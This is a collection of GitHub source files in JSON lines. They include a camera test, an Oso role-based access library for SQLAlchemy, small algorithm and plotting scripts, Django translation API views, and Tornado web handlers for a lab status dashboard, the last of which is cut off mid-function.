{"seq_id":"1719084081","text":"import sensor\nimport lcd\n\nlcd.init()\n# camera setup\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.run(1)\n\n# LCD direction control\nlcd.direction(lcd.YX_LRUD)\n\nwhile 1:\n    img = sensor.snapshot()\n    lcd.display(img)\n","repo_name":"0xb5951/ArduinoDev","sub_path":"m5stickv/camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"20138824014","text":"from typing import Any, List\n\nfrom sqlalchemy.types import Integer, String\nfrom sqlalchemy.schema import Column, ForeignKey\nfrom sqlalchemy.ext.declarative import 
declared_attr\nfrom sqlalchemy.orm import relationship, validates, class_mapper\nfrom sqlalchemy.orm.util import object_mapper\nfrom sqlalchemy.orm.exc import UnmappedInstanceError, UnmappedClassError\nfrom sqlalchemy import inspect, UniqueConstraint\nfrom sqlalchemy.exc import IntegrityError\nfrom .session import _OsoSession\n\n# Global list to keep track of role classes as they are created, used to\n# generate RBAC base policy in Polar\nROLE_CLASSES: List[Any] = []\n\n\ndef resource_role_class(\n declarative_base, user_model, resource_model, role_choices, mutually_exclusive=True\n):\n \"\"\"Create a :ref:`resource-specific role` Mixin\n for SQLAlchemy models. The role mixin is an\n `Association Object `_\n between the ``user_model`` and the ``resource_model``.\n\n :param declarative_base: The SQLAlchemy declarative base model that \\\n the role model and all related models are mapped to.\n\n :param user_model: The SQLAlchemy model representing users that the \\\n resource-specific roles can be assigned to. The generated Role mixin will \\\n have a many-to-one (Foreign Key) relationship with this user model. \\\n A many-to-many relationship to ``resource_model`` is added to ``user_model``; \\\n the relationship is named following the convention: ``resource_model.__name__.lower() + \"s\"``.\n\n :param resource_model: The SQLAlchemy model representing resources that \\\n the generated Role mixin will be scoped to. The Role mixin will \\\n have a many-to-one (ForeignKey) relationship with this resource model. \\\n A many-to-many relationship to ``user_model`` is added to ``resource_model``; \\\n the relationship is named ``users``. \\\n NOTE: only one role model can be created per resource model. Attempting to call \\\n ``resource_role_class()`` more than once for the same resource model will result in \\\n a ``ValueError``.\n\n :param roles: An order-independent list of the built-in roles for this resource-specific role type.\n :type roles: List[str]\n\n :param mutually_exclusive: Boolean flag that sets whether or not users \\\n can have more than one role for a given resource. Defaults to ``True``.\n :type roles: bool\n\n :return: the ResourceRole mixin, which must then be mixed into a SQLAlchemy model for the role. E.g.,\n\n .. 
code-block:: python\n\n        OrganizationRoleMixin = oso_roles.resource_role_class(\n            Base, User, Organization, [\"OWNER\", \"MEMBER\", \"BILLING\"]\n        )\n\n        class OrganizationRole(Base, OrganizationRoleMixin):\n            pass\n\n\n    \"\"\"\n\n    global ROLE_CLASSES\n    if resource_model in [role.get(\"resource_model\") for role in ROLE_CLASSES]:\n        raise ValueError(\n            f\"Cannot create two Role classes for the same `resource_model`: {resource_model.__name__}\"\n        )\n\n    ROLE_CLASSES.append(\n        {\n            \"user_model\": user_model,\n            \"resource_model\": resource_model,\n        }\n    )\n\n    resource_name = _get_resource_name_lower(resource_model)\n    tablename = f\"{resource_name}_roles\"\n    if mutually_exclusive:\n        unique_constraint = UniqueConstraint(f\"{resource_name}_id\", \"user_id\")\n    else:\n        unique_constraint = UniqueConstraint(f\"{resource_name}_id\", \"name\", \"user_id\")\n\n    class ResourceRoleMixin:\n        choices = role_choices\n\n        __tablename__ = tablename\n        id = Column(Integer, primary_key=True)\n        name = Column(String())\n        __table_args__ = (unique_constraint,)\n\n        @validates(\"name\")\n        def validate_name(self, key, name):\n            if name not in self.choices:\n                raise ValueError(\n                    f\"{name} is not a valid choice for {self.__class__.__name__}\"\n                )\n            return name\n\n        @declared_attr\n        def user_id(cls):\n            type = inspect(user_model).primary_key[0].type\n            name = inspect(user_model).primary_key[0].name\n            table_name = user_model.__tablename__\n            return Column(type, ForeignKey(f\"{table_name}.{name}\"))\n\n        @declared_attr\n        def user(cls):\n            return relationship(user_model.__name__, backref=tablename)\n\n    # These two attributes are defined at function scope (not inside the class)\n    # so they are in scope for the setattr calls that attach them to the mixin\n    # under dynamic, resource-specific names below.\n    @declared_attr\n    def resource_id(cls):\n        type = inspect(resource_model).primary_key[0].type\n        name = inspect(resource_model).primary_key[0].name\n        table_name = resource_model.__tablename__\n        return Column(type, ForeignKey(f\"{table_name}.{name}\"))\n\n    @declared_attr\n    def resource(cls):\n        return relationship(resource_model.__name__, backref=\"roles\")\n\n    setattr(ResourceRoleMixin, f\"{resource_name}_id\", resource_id)\n    setattr(ResourceRoleMixin, resource_name, resource)\n\n    # Add the relationship between the user_model and the resource_model\n    resources = relationship(\n        resource_model.__name__,\n        secondary=tablename,\n        viewonly=True,\n        backref=\"users\",\n        sync_backref=False,\n    )\n    # @Q: Do we try to pluralize this name correctly?\n    setattr(user_model, resource_name + \"s\", resources)\n\n    return ResourceRoleMixin\n\n\ndef enable_roles(oso):\n    # TODO: ensure this docstring is still accurate\n    \"\"\"Enable the SQLAlchemy Role-Based Access Control base policy. This method activates the following polar rules:\n\n    ``role_allow(role, action, resource)``:\n        Allows actors that have the role ``role`` to take ``action`` on\n        ``resource``. ``role`` is a SQLAlchemy role model generated by\n        :py:meth:`sqlalchemy_oso.roles.resource_role_class`. ``resource``\n        is a SQLAlchemy model to which the ``role`` applies. Roles apply\n        to the resources they are scoped to. For example,\n        ``OrganizationRole`` roles apply to ``Organization`` resources.\n        Roles may also apply to resources as specified by\n        ``resource_role_applies_to`` Polar rules. E.g.,\n\n        .. code-block:: polar\n\n            role_allow(role: OrganizationRole{name: \"MEMBER\"}, \"READ\", org: Organization);\n\n\n    ``resource_role_applies_to(child_resource, parent_resource)``:\n        Permits roles that control access to `parent_resource` to apply to\n        `child_resource` as well. 
`parent_resource` must be a resource\n that has a resource role class associated with it (see\n :py:meth:`sqlalchemy_oso.roles.resource_role_class`). E.g.,\n\n .. code-block:: polar\n\n ### An organization's roles apply to its child repositories\n resource_role_applies_to(repo: Repository, parent_org) if\n parent_org = repo.organization;\n\n The above rule makes it possible to write `role_allow` rules\n between `OrganizationRole` and `Repository`. E.g.,\n\n .. code-block:: polar\n\n role_allow(role: OrganizationRole{name: \"MEMBER\"}, \"READ\", repo: Repository);\n\n ``[resource_name]_role_order([\"ROLE_NAME_1\", \"ROLE_NAME_2\",...])``:\n Specifies a hierarchical role order for built-in\n resource-specific roles defined with\n :py:meth:`sqlalchemy_oso.roles.resource_role_class` The rule name\n is the lower-cased resource model name followed by\n ``_role_order``. The only parameter is a list of role names in\n hierarchical order. Roles to the left will inherit the\n permissions of roles to the right. This is useful if any role\n should inherit all the permissions of another role. It is not\n required for all built-in roles to be specified in the list. E.g.,\n\n .. code-block:: polar\n\n repository_role_order([\"ADMIN\", \"MAINTAIN\", \"WRITE\", \"TRIAGE\", \"READ\"]);\n\n Is the equivalent of writing:\n\n .. code-block:: polar\n\n role_allow(role: RepositoryRole{name: \"ADMIN\"}, _action, _resource) if\n role_allow(new RepositoryRole{name: \"MAINTAIN\"}, _action, _resource);\n\n role_allow(role: RepositoryRole{name: \"MAINTAIN\"}, _action, _resource) if\n role_allow(new RepositoryRole{name: \"WRITE\"}, _action, _resource);\n\n ...and so on.\n\n\n :param oso: The Oso instance used to evaluate the policy.\n :type oso: Oso\n \"\"\"\n\n if not _OsoSession.set:\n raise Exception(\n \"Sqlalchemy roles requires the sqlalchemy OsoSession. Please call session.set_get_session before enable_roles.\"\n )\n\n global ROLE_CLASSES\n\n policy = \"\"\"\n # RBAC BASE POLICY\n\n ## Top-level RBAC allow rule\n\n ### The association between the resource roles and the requested resource is outsourced from the rbac_allow\n allow(user, action, resource) if\n resource_role_applies_to(resource, role_resource) and\n user_in_role(user, role, role_resource) and\n role_allow(role, action, resource);\n\n # RESOURCE-ROLE RELATIONSHIPS\n\n ## These rules allow roles to apply to resources other than those that they are scoped to.\n ## The most common example of this is nested resources, e.g. 
Repository roles should apply to the Issues\n ## nested in that repository.\n\n ### A resource's roles applies to itself\n resource_role_applies_to(role_resource, role_resource);\n\n # ROLE-ROLE RELATIONSHIPS\n\n ## Role Hierarchies\n\n ### Grant a role permissions that it inherits from a more junior role\n role_allow(role, action, resource) if\n inherits_role(role, inherited_role) and\n role_allow(inherited_role, action, resource);\n\n ### Helper to determine relative order or roles in a list\n inherits_role_helper(role, inherited_role, role_order) if\n ([first, *rest] = role_order and\n role = first and\n inherited_role in rest) or\n ([first, *rest] = role_order and\n inherits_role_helper(role, inherited_role, rest));\n \"\"\"\n\n for role_model in ROLE_CLASSES:\n user_model = role_model[\"user_model\"]\n user = user_model.__name__\n resource_model = role_model[\"resource_model\"]\n resource = resource_model.__name__\n role = get_role_model_for_resource_model(resource_model).__name__\n\n policy += f\"\"\"\n user_in_role(user: {user}, role, resource: {resource}) if\n session = OsoSession.get() and\n role in session.query({role}).filter_by(user: user) and\n role.{resource.lower()}.id = resource.id;\n\n inherits_role(role: {role}, inherited_role) if\n {resource.lower()}_role_order(role_order) and\n inherits_role_helper(role.name, inherited_role_name, role_order) and\n inherited_role = new {role}(name: inherited_role_name, {resource.lower()}: role.{resource.lower()});\n \"\"\"\n oso.load_str(policy)\n\n\n# ROLE HELPERS\n\n\ndef _get_resource_name_lower(resource_model):\n return resource_model.__name__.lower()\n\n\ndef _check_valid_model(*args, raise_error=True):\n for model in args:\n valid = True\n try:\n class_mapper(model)\n except UnmappedClassError:\n valid = False\n\n if raise_error and not valid:\n raise TypeError(f\"Expected a model (mapped class); received: {model}\")\n\n\ndef _check_valid_instance(*args, raise_error=True):\n for instance in args:\n valid = True\n try:\n object_mapper(instance)\n except UnmappedInstanceError:\n valid = False\n\n if raise_error and not valid:\n raise TypeError(f\"Expected a mapped object instance; received: {instance}\")\n\n\ndef get_role_model_for_resource_model(resource_model):\n _check_valid_model(resource_model)\n return (\n inspect(resource_model, raiseerr=True)\n .relationships.get(\"roles\")\n .argument.class_\n )\n\n\ndef get_user_model_for_resource_model(resource_model):\n _check_valid_model(resource_model)\n return inspect(resource_model).relationships.get(\"users\").argument.class_\n\n\ndef get_user_roles(session, user, resource_model, resource_id=None):\n \"\"\"Get a user's roles for all resources of a single resource type.\n E.g., get all of a user's repositories and their role for each\n repository.\n Or optionally, all roles scoped to a specific resource_id.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param user: user record (python object) of the SQLAlchemy user model \\\n associated with roles scoped to the supplied ``resource_model``\n\n :param resource_id: (optional) the resource id for which to get the user's roles.\n\n :return: list of the user's roles\n \"\"\"\n _check_valid_instance(user)\n _check_valid_model(resource_model)\n role_model = get_role_model_for_resource_model(resource_model)\n\n roles = (\n session.query(role_model)\n .join(resource_model)\n .filter(role_model.user == user)\n .order_by(resource_model.id)\n .order_by(role_model.name)\n )\n\n if resource_id:\n roles = 
roles.filter(resource_model.id == resource_id)\n    return roles.all()\n\n\ndef get_resource_roles(session, resource):\n    \"\"\"Get all of the roles for a specific resource. E.g.,\n    get all the roles in Organization 1. Each role has a single user\n    associated with it, which can be accessed by calling ``role.user``.\n\n    :param session: SQLAlchemy session\n    :type session: sqlalchemy.orm.session.Session\n\n    :param resource: the resource record (python object) for which to get \\\n    the users and roles\n\n    :return: List of roles associated with the ``resource``\n\n    \"\"\"\n    _check_valid_instance(resource)\n    return resource.roles\n\n\n# - Get all the users who have a specific role\ndef get_resource_users_by_role(session, resource, role_name):\n    \"\"\"Get all of the users that have a specific role for a specific\n    resource. E.g., get all the users in Organization 1 that have the \"OWNER\"\n    role.\n\n    :param session: SQLAlchemy session\n    :type session: sqlalchemy.orm.session.Session\n\n    :param resource: the resource record (python object) for which to get \\\n    the users\n\n    :param role_name: the name of the role to get users for\n    :type role_name: str\n\n    :return: List of users that have the ``role_name`` role for \\\n    ``resource``\n\n    \"\"\"\n    # TODO: would it be helpful to aggregate the roles by name if `role_name`\n    # is None? E.g. return a dict of {role_name: [users]}?\n    _check_valid_instance(resource)\n    resource_model = type(resource)\n    resource_name = _get_resource_name_lower(resource_model)\n    role_model = get_role_model_for_resource_model(resource_model)\n    user_model = get_user_model_for_resource_model(resource_model)\n\n    # filter on the resource field dynamically rather than hard-coding \"repository\"\n    users = (\n        session.query(user_model)\n        .join(role_model)\n        .filter_by(**{resource_name: resource, \"name\": role_name})\n        .order_by(user_model.id)\n        .all()\n    )\n\n    return users\n\n\n# - Assign a user to an organization with a role\ndef add_user_role(session, user, resource, role_name, commit=False):\n    \"\"\"Add a user to a role for a specific resource.\n\n    :param session: SQLAlchemy session\n    :type session: sqlalchemy.orm.session.Session\n\n    :param user: user record (python object) to assign the role to\n\n    :param role_name: the name of the role to assign to the user\n    :type role_name: str\n\n    :param commit: flag to specify whether or not session should be committed after adding role; defaults to ``False``\n    :type commit: boolean\n    \"\"\"\n    _check_valid_instance(user, resource)\n    # get models\n    resource_model = type(resource)\n    role_model = get_role_model_for_resource_model(resource_model)\n\n    # create and save role\n    resource_name = _get_resource_name_lower(resource_model)\n    kwargs = {\"name\": role_name, resource_name: resource, \"user\": user}\n    new_role = role_model(**kwargs)\n    session.add(new_role)\n    if commit:\n        try:\n            session.commit()\n        except IntegrityError:\n            session.rollback()\n            raise Exception(\n                f\"\"\"Cannot assign user {user} to role {role_name} for\n                {resource_name} either because the assignment already exists, or\n                because the role is mutually exclusive and the user already has\n                another role for this resource.\"\"\"\n            )\n\n\n# - Remove a user's role for a resource\ndef delete_user_role(session, user, resource, role_name=None, commit=False):\n    \"\"\"Remove a user from a role for a specific resource.\n\n    :param session: SQLAlchemy session\n    :type session: sqlalchemy.orm.session.Session\n\n    :param user: user record (python object) to remove the role from\n\n    :param role_name: the name of the role to remove from the user. 
If not \\\n provided, the function will remove all roles the user has for \\\n ``resource``.\n :type role_name: str\n\n :param commit: flag to specify whether or not session should be committed after deleting role; defaults to ``False``\n :type commit: boolean\n \"\"\"\n _check_valid_instance(user, resource)\n resource_model = type(resource)\n resource_name = _get_resource_name_lower(resource_model)\n role_model = get_role_model_for_resource_model(resource_model)\n\n filter_kwargs = {\"user\": user, resource_name: resource}\n if role_name:\n filter_kwargs[\"name\"] = role_name\n roles = session.query(role_model).filter_by(**filter_kwargs)\n\n roles.delete()\n if commit:\n session.commit()\n\n\n# - Change the user's role in an organization\ndef reassign_user_role(session, user, resource, role_name, commit=False):\n \"\"\"Remove all existing roles that a user has for a specific resource, and\n reassign the user to a new role. If the user does not have any roles for\n the given resource, the behavior is the same as\n :py:meth:`sqlalchemy_oso.roles.add_user_role`.\n\n :param session: SQLAlchemy session\n :type session: sqlalchemy.orm.session.Session\n\n :param user: user record (python object) whose role should be reassigned\n\n :param role_name: the name of the new role to assign to the user\n :type role_name: str\n\n :param commit: flag to specify whether or not session should be committed after reassigning role; defaults to ``False``\n :type commit: boolean\n \"\"\"\n _check_valid_instance(user, resource)\n resource_model = type(resource)\n resource_name = _get_resource_name_lower(resource_model)\n role_model = get_role_model_for_resource_model(resource_model)\n\n filter_kwargs = {\"user\": user, resource_name: resource}\n\n session.query(role_model).filter_by(**filter_kwargs).update({\"name\": role_name})\n\n if commit:\n session.commit()\n","repo_name":"simmsb/oso-patch","sub_path":"sqlalchemy_oso/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":18594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35571964735","text":"\"\"\"\n-- Created by Pravesh Budhathoki\n-- Created on 2023-06-12\n\"\"\"\n\n\n# 20. 
Valid Parentheses\n# Given a string s containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\n#\n# An input string is valid if:\n#\n# Open brackets must be closed by the same type of brackets.\n# Open brackets must be closed in the correct order.\n# Every close bracket has a corresponding open bracket of the same type.\n# Example 1:\n# Input: s = \"()\"\n# Output: true\n#\n# Example 2:\n# Input: s = \"()[]{}\"\n# Output: true\n#\n# Example 3:\n# Input: s = \"(]\"\n# Output: false\nclass Solution:\n    def isValid(self, s: str) -> bool:\n        stack = []\n        for string in s:\n            if string in [\"(\", \"{\", \"[\"]:\n                stack.append(string)\n            elif string == \")\" and len(stack) != 0 and stack[-1] == \"(\":\n                stack.pop()\n            elif string == \"}\" and len(stack) != 0 and stack[-1] == \"{\":\n                stack.pop()\n            elif string == \"]\" and len(stack) != 0 and stack[-1] == \"[\":\n                stack.pop()\n            else:\n                return False\n        return stack == []\n\n\nif __name__ == '__main__':\n    solution = Solution()\n    _s = \"[\"\n    result = solution.isValid(_s)\n    print(result)\n","repo_name":"Pravesh22/code_practice","sub_path":"valid_parenthesis.py","file_name":"valid_parenthesis.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"26698536906","text":"import time\n\ndef calcPrime(n):\n    primes = [2,3]\n    for i in range(2, n):\n        isPrime = True\n        for j in primes:\n            if (i % j == 0):\n                isPrime = False\n                break  # one divisor is enough to rule the number out\n        if(isPrime):\n            primes.append(i)\n    return primes\n\ndef calcTime(fun, *args):\n    # call the function here so its runtime is actually measured;\n    # the previous version received an already-computed value and timed nothing\n    t = time.time()\n    fun(*args)\n    return (time.time() - t)\n\nif __name__ == '__main__':\n    prList1 = calcPrime(1000)\n    tim1 = calcTime(calcPrime, 1000)\n    prList2 = calcPrime(10000)\n    tim2 = calcTime(calcPrime, 10000)\n    print('Elapsed time for calculating prime numbers 0 - 1000:', tim1)\n    print('Elapsed time for calculating prime numbers 0 - 10000:', tim2)\n","repo_name":"amirhpd/AST_Ex02","sub_path":"AST-2018-WT-ExSheet-02-Rashid-Pakdaman/Ex5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"34594440258","text":"import colorsys\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\ndef get_hsv(hexrgb):\n    hexrgb = hexrgb.lstrip(\"#\") # in case you have Web color specs\n    r, g, b = (int(hexrgb[i:i + 2], 16) / 255.0 for i in (0, 2, 4))\n    return colorsys.rgb_to_hsv(r, g, b)\n\ndef main():\n    with open('storage.pkl', 'rb') as f:\n        storage = pickle.load(f)\n\n\n    hlist = []\n    for group in storage:\n        for color in group:\n            h,s,v=get_hsv(color)\n            if s>0 and v>0:\n                hlist.append(h)\n\n    n=100\n    bins = np.arange(-0.01,1.01,0.01)\n\n    # 'normed' was removed from NumPy; 'density=True' is the equivalent\n    probs, bin_edges = np.histogram(hlist, density=True, bins=bins)\n    vect=np.linspace(0.0, 2 * np.pi, n, endpoint=False)\n\n    # vect=np.append(vect, vect[0])\n    # probs=np.append(probs, probs[0])\n\n\n    f2 = interp1d(vect, probs[1:], kind='cubic')\n\n\n\n    # N = 1000\n    # bottom = 8\n    # max_height = 4\n\n    xnew = np.linspace(min(vect), max(vect), 10000, endpoint=False)\n\n\n    ax = plt.subplot(111, polar=True)\n    ax.plot(xnew,np.ones(len(xnew))*2,color='black')\n    ax.plot(xnew,np.ones(len(xnew))*10,color='black')\n\n    # ax.plot(xnew, f2(xnew)*4)\n\n    width = (2 * np.pi) / 10000\n    ax = plt.subplot(111, polar=True)\n    bars = ax.bar(xnew, f2(xnew), width=width, bottom=2,linewidth=0)\n\n    # Use custom colors and opacity\n    
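# NOTE: the commented-out version below passed the raw angle r as the hue, but\n    # colorsys.hsv_to_rgb expects hue in [0, 1]; the live loop divides by 2*pi.\n    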
# for r, bar in zip(xnew, bars):\n # bar.set_facecolor(colorsys.hsv_to_rgb(r, 1, 1))\n # bar.set_alpha(0.8)\n\n # Use custom colors and opacity\n for r, bar in zip(xnew, bars):\n bar.set_facecolor(colorsys.hsv_to_rgb(r/( 2 * np.pi), 1, 1))\n bar.set_alpha(0.75)\n plt.axis('off')\n\n plt.savefig('figures/radial_colors.png',dpi=300)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NicholasARossi/color_me_impressed","sub_path":"color_histogram_plot.py","file_name":"color_histogram_plot.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"73691526623","text":"from django.http import JsonResponse\nfrom .models import Drink, Translation\nfrom .serializer import DrinkSerializer, TranslationSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom datetime import datetime\n\nfrom drinks import OWLTrans\n#from OwlTranslation import OwlTranslation\n\n@api_view(['GET', 'POST'])\ndef drink_list(request):\n\n if request.method=='GET':\n drinks = Drink.objects.all()\n serializer = DrinkSerializer(drinks, many=True)\n return JsonResponse({'drinks': serializer.data})\n\n if request.method=='POST':\n serializer = DrinkSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n@api_view(['GET', 'PUT', \"DELETE\"])\ndef drink_detail(request, id):\n try:\n drink = Drink.objects.get(pk=id)\n except Drink.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if request.method=='GET':\n serializer = DrinkSerializer(drink)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = DrinkSerializer(drink, data=request.data)\n if (serializer.is_valid()):\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n drink.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['POST'])\ndef doTranslation(request) :\n print(\"LOG doTranslation is called with \", request.data)\n #yoonFuncs.printFunc()\n #result = onmtModel.translate(request.data['src'], request.data['srcText'])\n request.data['timeStamp'] = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n\n result = \"\"\n if request.data['src']=='ko' and request.data['tgt']=='en':\n result = OWLTrans.translateKoEn([request.data['srcText']])\n\n elif request.data['src'] == 'en' and request.data['tgt']=='ko':\n print(\"[LOG] if en and ko\")\n result = OWLTrans.translateEnKo([request.data['srcText']])\n\n print(\"[LOG result]\", result) \n request.data['tgtText'] = result[0]\n print(request.data)\n\n if request.method=='POST':\n serializer = TranslationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n print(\"LOG is not valid!! 
something error ...\")\n return Response(serializer.errors)","repo_name":"YoonjungChoi/CMPE295_NMT_Project","sub_path":"webApps/backend/drinks/drinks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4078956367","text":"import tornado.web\nimport json\nimport requests\nimport os\nimport sys\nfrom datetime import datetime, timedelta\nfrom dateutil import parser\n\n\n#########################\n# Useful misc handlers #\n#########################\n\nERROR_CODES = {\n 400: \"Bad Request\",\n 401: \"Unauthorized\",\n 403: \"Forbidden\",\n 404: \"Page Not Found\",\n 405: \"Method Not Allowed\",\n 406: \"Not Acceptable\",\n 407: \"Proxy Authentication Required\",\n 408: \"Request Timeout\",\n 414: \"Request-URI Too Long\",\n 500: \"Internal Server Error\",\n 501: \"Not Implemented\",\n 502: \"Bad Gateway\",\n 503: \"Service Unavailable\",\n 504: \"Gateway Timeout\",\n 511: \"Network Authentication Required\",\n}\n\n\nclass User(object):\n \"\"\"A minimal user class\"\"\"\n\n def __init__(self, name, email, roles):\n self.name = name\n self.email = email\n self.roles = roles\n\n @property\n def is_admin(self):\n return \"admin\" in self.roles\n\n @property\n def is_pricing_admin(self):\n return \"pricing_admin\" in self.roles\n\n @property\n def is_sample_requirements_admin(self):\n return \"sample_requirements_admin\" in self.roles\n\n @property\n def is_any_admin(self):\n return (\n self.is_admin or self.is_pricing_admin or self.is_sample_requirements_admin\n )\n\n @property\n def is_proj_coord(self):\n return \"proj_coord\" in self.roles\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n \"\"\"Base Handler. Handlers should not inherit from this\n class directly but from either SafeHandler or UnsafeHandler\n to make security status explicit.\n\n \"\"\"\n\n def get(self):\n \"\"\"The GET method on this handler will be overwritten by all other handler.\n\n As it is the default handler used to match any request that is not mapped\n in the main app, a 404 error will be raised in that case (because the get method\n won't be overwritten in that case)\n \"\"\"\n raise tornado.web.HTTPError(404, reason=\"Page not found\")\n\n def get_current_user(self):\n # Disables authentication if test mode to ease integration testing\n if self.application.test_mode:\n name = \"Testing User!\"\n roles = [\n \"admin\",\n \"pricing_admin\",\n \"sample_requirements_admin\",\n \"proj_coord\",\n ]\n email = \"Testing User!\"\n else:\n name = (\n str(self.get_secure_cookie(\"user\"), \"utf-8\")\n if self.get_secure_cookie(\"user\")\n else None\n )\n # Fix ridiculous bug with quotation marks showing on the web\n if name:\n if (name[0] == '\"') and (name[-1] == '\"'):\n name = name[1:-1]\n roles = (\n json.loads(str(self.get_secure_cookie(\"roles\"), \"utf-8\"))\n if self.get_secure_cookie(\"roles\")\n else [\"user\"]\n )\n email = (\n str(self.get_secure_cookie(\"email\"), \"utf-8\")\n if self.get_secure_cookie(\"email\")\n else None\n )\n user = User(name, email, roles)\n if user.name:\n return user\n else:\n return None\n\n def write_error(self, status_code, **kwargs):\n \"\"\"Overwrites write_error method to have custom error pages.\n\n http://tornado.readthedocs.org/en/latest/web.html#tornado.web.RequestHandler.write_error\n \"\"\"\n reason = \"Unknown Error\"\n\n # Get information about the triggered exception\n self.application.gs_globals[\"exception_fulltext\"] = 
repr(sys.exc_info())\n\n # Get the status code and error reason\n if status_code in list(ERROR_CODES):\n reason = ERROR_CODES[status_code]\n try:\n if \"exc_info\" in kwargs:\n _, error, _ = kwargs[\"exc_info\"]\n reason = error.reason\n except AttributeError:\n pass\n\n # Return JSON if this is an API call\n if \"/api/v1/\" in self.request.uri:\n jsondict = {\n \"page_title\": \"Error {}: {}\".format(status_code, reason),\n \"error_status\": status_code,\n \"error_reason\": reason,\n \"error_exception\": self.application.gs_globals[\"exception_fulltext\"],\n }\n self.set_header(\"Content-type\", \"application/json\")\n self.write(json.dumps(jsondict))\n\n # Render the error template\n else:\n t = self.application.loader.load(\"error_page.html\")\n self.write(\n t.generate(\n gs_globals=self.application.gs_globals,\n status=status_code,\n reason=reason,\n user=self.get_current_user(),\n )\n )\n\n def get_multiqc(self, project_id):\n \"\"\"\n Getting multiqc reports for requested project from the filesystem\n Returns a string containing html if report exists, otherwise None\n \"\"\"\n view = self.application.projects_db.view(\"project/id_name_dates\")\n rows = view[project_id].rows\n project_name = \"\"\n multiqc_reports = {}\n # get only the first one\n for row in rows:\n project_name = row.value.get(\"project_name\", \"\")\n break\n\n if project_name:\n multiqc_path = self.application.multiqc_path or \"\"\n for type in [\"_\", \"_qc_\", \"_pipeline_\"]:\n multiqc_name = \"{}{}multiqc_report.html\".format(project_name, type)\n multiqc_file_path = os.path.join(multiqc_path, multiqc_name)\n if os.path.exists(multiqc_file_path):\n with open(multiqc_file_path, \"r\", encoding=\"utf-8\") as multiqc_file:\n html = multiqc_file.read()\n multiqc_reports[type] = html\n return multiqc_reports\n\n @staticmethod\n def get_user_details(app, user_email):\n user_details = {}\n if user_email == \"Testing User!\":\n user_email = app.settings.get(\"username\", None) + \"@scilifelab.se\"\n user_details = {\n \"userpreset\": {\"Hardcoded One\": {}}\n } # Just to show something locally\n rows = app.gs_users_db.view(\"authorized/users\", include_docs=True)[\n user_email\n ].rows\n if len(rows) == 1:\n user_details = dict(rows[0].doc)\n\n return user_details\n\n\nclass SafeHandler(BaseHandler):\n \"\"\"All handlers that need authentication and authorization should inherit\n from this class.\n \"\"\"\n\n @tornado.web.authenticated\n def prepare(self):\n \"\"\"This method is called before any other method.\n\n Having the decorator @tornado.web.authenticated here implies that all\n the Handlers that inherit from this one are going to require\n authentication in all their methods.\n \"\"\"\n pass\n\n\nclass UnsafeHandler(BaseHandler):\n pass\n\n\nclass MainHandler(UnsafeHandler):\n \"\"\"Serves the html front page upon request.\"\"\"\n\n def get(self):\n t = self.application.loader.load(\"index.html\")\n user = self.get_current_user()\n # Avoids pulling all historic data by assuming we have less than 30 NAS:es\n view = self.application.server_status_db.view(\n \"nases/by_timestamp\", descending=True, limit=30\n )\n latest = max([parser.parse(row.key) for row in view.rows])\n # assuming that status db is not being updated more often than every 5 minutes\n reduced_rows = [\n row\n for row in view.rows\n if latest - parser.parse(row.key) <= timedelta(minutes=5)\n ]\n instruments = self.application.server_status[\"instruments\"]\n server_status = {}\n for row in reduced_rows:\n server = row.value.get(\"name\")\n if 
server is None:\n                continue\n            if server not in server_status:\n                server_status[server] = row.value\n            server_status[server][\"instrument\"] = instruments.get(server, \"-\")\n            used_percentage = float(\n                row.value.get(\"used_percentage\", \"0\").replace(\"%\", \"\")\n            )\n            # check the more severe threshold first, otherwise > 80 is unreachable\n            if used_percentage > 80:\n                server_status[server][\"css_class\"] = \"q-danger\"\n            elif used_percentage > 60:\n                server_status[server][\"css_class\"] = \"q-warning\"\n            else:\n                server_status[server][\"css_class\"] = \"\"\n        # sort by used space\n        server_status = sorted(\n            server_status.items(),\n            key=lambda item: item[1].get(\"used_percentage\"),\n            reverse=True,\n        )\n        # Load presets to populate the projects links\n        presets_list = self.get_argument(\"presets_list\", \"pv_presets\")\n        presets = {}\n        if self.get_current_user():\n            user_details = self.get_user_details(\n                self.application, self.get_current_user().email\n            )\n            presets = {\n                \"default\": self.application.genstat_defaults.get(presets_list),\n                \"user\": user_details.get(\"userpreset\"),\n            }\n\n        self.write(\n            t.generate(\n                gs_globals=self.application.gs_globals,\n                user=user,\n                server_status=server_status,\n                presets=presets,\n            )\n        )\n\n\ndef dthandler(obj):\n    \"\"\"ISO formatting for datetime to be used in JSON.\"\"\"\n    if 